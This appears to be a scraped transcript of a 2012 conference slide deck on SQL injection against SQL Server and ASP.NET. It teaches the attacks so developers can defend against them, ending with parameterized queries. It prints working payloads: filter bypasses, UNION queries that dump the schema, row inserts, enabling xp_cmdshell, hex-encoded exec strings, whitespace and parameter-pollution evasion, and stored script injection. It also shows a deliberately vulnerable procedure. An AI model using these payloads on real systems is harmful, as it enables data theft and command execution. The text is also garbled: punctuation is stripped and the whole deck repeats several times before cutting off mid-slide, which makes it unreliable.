understanding and preventing sql injection · –bypass the filter: ... information_schema.columns...
TRANSCRIPT
abcdrsquo DROP TABLE PRESENTATIONS --
AKA SQL Injection the fast fun and easy way to ruin someonersquos day
Columbus Code Camp 2012
Kevin Feasel feaselklgmailcom
Understanding and Preventing SQL Injection
Who Am I
bull Database Administrator ndash Former web developer
ndash SQL Server DBA
ndash Currently working for Aetna bull Standard employer
disclaimer
bull Security Nut
bull Cyclist
bull Occasional world traveler
What Is SQL Injection
bull Injecting code in a manner the application developers did not expect
ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Who Am I
bull Database Administrator ndash Former web developer
ndash SQL Server DBA
ndash Currently working for Aetna bull Standard employer
disclaimer
bull Security Nut
bull Cyclist
bull Occasional world traveler
What Is SQL Injection
bull Injecting code in a manner the application developers did not expect
ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
What Is SQL Injection
bull Injecting code in a manner the application developers did not expect
ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
